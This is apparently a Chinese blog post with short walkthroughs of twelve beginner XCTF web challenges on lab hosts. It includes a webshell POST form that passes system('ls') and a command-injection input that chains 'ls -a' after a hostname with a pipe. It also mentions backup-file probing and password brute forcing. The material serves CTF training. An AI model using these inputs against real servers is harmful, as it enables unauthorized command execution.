网络攻防路2-xctf

最新推荐文章于 2024-08-14 21:03:30 发布
最新推荐文章于 2024-08-14 21:03:30 发布
阅读量325 收藏
点赞数
分类专栏: 网络信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013896018/article/details/103436026
版权

1  view_source

查看网页源代码,以谷歌浏览器为例,可以右键查看,或者按F12

2  get_post

理解浏览器访问服务器的两种方式,

get方式

 http://111.198.29.45:39414/?a=1

post方式  

<body>

<h1>请用GET方式提交一个名为a,值为1的变量</h1>

<h1>请再以POST方式随便提交一个名为b,值为2的变量</h1>
    <form action="http://111.198.29.45:39414/?a=1" method="post">
        <input type="text" name="b" value="2">
        <input type="submit" value="submit">
    </form>

</body>

3  robots

访问robots.txt文档,http://111.198.29.45:55292/robots.txt

4 backup

访问服务器备份文件,http://111.198.29.45:35770/index.php.bak

5 cookie

查看浏览器上对某个网站的cookie,

6 disabled_button

修改网页源代码

<input class="btn btn-default" style="height:50px;width:200px;" type="submit" value="flag" name="auth">

7 simple_js

阅读JS,发现答案,两次ASCII转码

dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30")

8 xff_referer

分别修改xff和referer,貌似必须使用其他工具或插件

9 weak_auth 

对用户名和密码进行爆破,貌似也必须使用工具

10 webshell

以POST的方式提交shell变量

<form action="http://111.198.29.45:33598/" method="post">
  <input type="text" name="shell" value="system('ls');">
  <input type="submit" value="submit">
</form>

11 command_execution

让服务器执行多个命令    www.baidu.com | ls -a

12 simple_php

阅读php后,以GET方式提交

http://111.198.29.45:44584/?a=0x0&b=12345p

 后记:

网页主页名一般是index,default

大紫明宫空离境
关注
专栏目录
【网络安全 | XCTF】攻防世界 ics-05 解题详析
等风来
05-31 3821
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
robots-xctf攻防世界
weixin_46168073的博客
11-19 1107
一、解析 可以看到 这是一个对robots协议的利用。 robots协议,基本上在渗透别人的时候是算是重要的,这个决定了爬虫能爬那些东西,那些东西不能爬取。 二、做题 点击进入题目。 可以看到进去之后一片空白。 我们在URL的后面输入robots.txt 然后他就出来了东西。 可以看到他说:不允许爬取flag_ls_h3re.php User-agent: * Disallow: Disallow: f1ag_1s_h3re.php 那我们直接在URL后面打
XCTF-攻防世界-密码学crypto-新手练习区-writeup
热门推荐
Ryannn_的博客
10-23 1万+
目录 0x00 base64 0x01 Caesar 0x02 Morse 0x03 Railfence 0x04 转轮机加密 0x05 easy_RSA 0x06 Normal_RSA 0x07 不仅仅是Morse 0x08 混合编码 0x09 easychallenge 0x0A easy_ECC 0x0B 幂数加密 0x00 base64 元宵节灯谜是一种古老的传...
XCTF(攻防世界)
qq_63685461的博客
12-02 859
1.this_is_flag 属于是介绍flag长啥样子了 2.pdf 下载附件 啥也没有 pdf格式的尝试转为word 3.如来十三掌 下载附件一个word文档 看这格式一个佛曰加密得到MzkuM3gvMUAwnzuvn3cgozMlMTuvqzAenJchMUAeqzWenzEmLJW9 试了base没用,想不到了就查了一下这个是rot-13加密 得到一串base加密字符串解密得到flag flag{bdscjhbkzmnfrdhbvckijndskvbkjdsab} 4....
【CTF | WEB】003、攻防世界WEB题目之xff_referer
最新发布
韩非雨的博客
08-14 945
XFF用于追踪客户端的真实 IP 地址,特别是在请求经过多个代理服务器时。Referer用于标识当前请求页面的来源页面,帮助服务器理解用户的访问径。这两个头字段在网络安全和流量分析中都非常重要。
XCTF 攻防世界
weixin_52033041的博客
11-21 366
小小的PDF 下载文件打开 有两页 并且第二页什么都没有 可疑 先用ctrl+a全选复制发现只能复制页码,并没有在照片地下隐藏flag 丢到kali中 使用binwalk看看有无有用信息 发现有三张图片,pdf中只有两张 这其实用的切分文件 用dd工具,具体用法自行百度 哈哈 生成一个png文件 打开 获得flag ...
XCTF攻防世界-Web-WriteUp
weixin_38912654的博客
12-17 880
目录 view_source get_post robots backup cookie disabled_button simple_js (本篇博客作为自己的学习记录,含有部分前辈大佬的码字,但是在操作上有更新之处,并且步骤较为详细,工具简单,介绍更为具体,特此记录以备回顾之需,也供其他学者借鉴,互相交流学习。) view_source 题目描述:X老师让小宁同学查看一个网...
XCTF攻防世界_Reverse_IgniteMe
T3rra_的博客
02-18 249
文件用IDA打开,反编译主函数 int __cdecl main(int argc, const char **argv, const char **envp) { void *v3; // eax int v4; // edx void *v5; // eax int result; // eax void *v7; // eax void *v8; // eax void *v9; // eax size_t i; // [esp+4Ch] [ebp-8Ch] cha
网络攻防4-xctf baby_web
大紫明宫空离境
11-07 310
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了...
网络攻防6-xctf php_rce
大紫明宫空离境
11-15 212
目录 一 ,php_rce 二,解题 三 ,总结 一 ,php_rce 这事一道PHP远程代码执行漏洞题,RCE全称remote code execution,翻译成中文就是远程代码执行。是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。 二,解题 1 进入试题 2 访问http://220.249.52.133:38152/index.ph
攻防世界XCTF-密码破译入门12题解题报告
m0_70534726的博客
05-14 472
听说你想学习破译密码(crypto)?这可是CTF中最冷门的鸭,你可真是个奇怪的人。还不如学习WEB安全,快去渗透它吧,给个好评哟~如果你坚持要搞crypto,那就来挑战12道新手密码题吧。相信我,你会转去做WEB安全的。如果你硬着皮头,搞到底,你会发现你是没朋友滴,嘿嘿,渗透大法好~ WEB安全攻防入门 作者 ailx10 会员专享¥9.99 去查看​ 攻防世界XCFT刷题信息汇总如下:攻防世界XCTF黑客笔记刷题记录,收藏一下哈~ ailx10 969次咨询 4.9 网络安..
XCTF 攻防世界 Reverse新手题(insanity, python-trade)
weixin_43456810的博客
12-12 2706
XCTF 攻防世界 Reverse新手题(insanity, python-trade) 1. insanity 这一题十分的简单,将下载下来的附件直接用IDA打开,查看Hey-View,在最右侧一栏进行查找,大概在后半部分,可以直接看到flag 2. python-trade 首先,这个题目没有用到IDA,因为看到下载的附件是.pyc后缀的,是python的字节码文件,可以先尝试pyc文件反编译。 有2种反编译的方法: 使用在线工具:https://tool.lu/pyc/,直接将pyc文件上传,即可看
XCTF攻防世界_Misc进阶区001
FAFU小宋的博客
10-30 520
XCTF_Misc_高手进阶区base64÷4reverseMesomething_in_imagewireshark-1pure_colorAesop_secreta_good_ideaTraining-Stegano-1can_has_stdio? base64÷4 (1)根据题目提示,直接用base16解密得到flag reverseMe (1)打开附件,发现是一张图片 (2)用画图工具打开该图片,使用水平翻转,即可查看到flag something_in_image 解法一: (1)使用
xctf 攻防世界 key
qq_41071646的博客
04-24 1536
好久没有去攻防世界玩了 主要是这段时间太忙了 有很多 杂事 缠身吧 然后没事看看堆 就。。 看自闭了 然后这道题其实还是很简单的 有很多函数 还有指令其实感觉 用od 或者ida 直接静态 就能查出来什么意思 就没有必要 去深究 里面的算法 点进去 主要的函数 发现了这个东西 注意这个 Memory 这个东西 我们往下看 这里 决定了我们的走向他就是参数之一 然...
xctf攻防世界 REVERSE 高手进阶区 Mysterious
l8947943的博客
04-01 9688
0x01. 进入环境,下载附件 给出的是一个exe文件,双击运行,如图: 需要输入密码才能破译,如何想办法搞到密码才就是关键 0x02.问题分析 使用exeinfoPE打开看看是否有加壳,如图: 并没有壳子,32位可执行文件,那么果断丢入IDA中进行查看内容,找到main函数,F5反编译,主函数代码如下,注释已写: int __stdcall sub_401090(HWND hWnd, int a2, int a3, int a4) { char v5; // [esp+50h] [ebp-310h
xctf攻防世界 CRYPTO高手进阶区 shanghai
l8947943的博客
02-15 901
0x01. 进入环境,下载附件 题目给的压缩包,包含一个txt文件,如图: 0x02. 问题分析 0x02_1. 维吉利亚密码 什么是维吉利亚密码?维吉尼亚密码是在凯撒密码基础上产生的一种加密方法,它将凯撒密码的全部25种位移排序为一张表,与原字母序列共同组成26行及26列的字母表。另外,维吉尼亚密码必须有一个密钥,这个密钥由字母组成,最少一个,最多可与明文字母数量相等。1 例如,我们有如下信息: 明文:I’ve got it. 密钥:ok 则可以得到密文: 密文:W’fs qcd wd. 操作如下,先看
XCTF攻防世界_Misc进阶区003
FAFU小宋的博客
11-14 514
XCTF_Misc进阶区simple_transferHear-with-your-Eyes simple_transfer (1)下载附件,得到一个流量包,用wireshark打开,在搜索框输入tcp contains flag查找flag,并没有发现有用信息。 (2)放到kali下,用foremost分解,得到一个pdf文件,打开看到flag。 Hear-with-your-Eyes (1)下载附件,一个.gz文件,解压后是一个没有后缀名的文件,用notepad++打开,没有flag信息。直接用7-z
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 339
格式化字符串泄露canary,栈溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个栈溢出漏洞 checksec了一下有canary的保护,开启了canary,就不能直接利用栈溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行栈溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
XCTF攻防世界_Web练习区
FAFU小宋的博客
10-30 539
XCTF_Web_新手练习区view_sourceget_postrobotsbackupcookiedisabled_buttonweak_authsimple_phpxff_refererwebshellcommand_executionsimple_js view_source 这里右键无法查看网页源代码,可通过f12键或者在url地址前加上"view-source:"查看网页源代码找到flag。 get_post HTTP常用的请求方法:get,post。 (1)直接把请求参数拼接在URL后面,
实战环境下的网络空间安全教育:GMIC-XCTF京津冀邀请赛与人才培养
"GMIC-XCTF京津冀邀请赛是一场聚焦网络空间安全的竞赛,旨在通过实战环境锤炼网络空间安全人才,推动该领域的人才培养。比赛中,北京航空航天大学的Lancet战队脱颖而出,获得了冠军。本次赛事体现了网络安全教育的新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值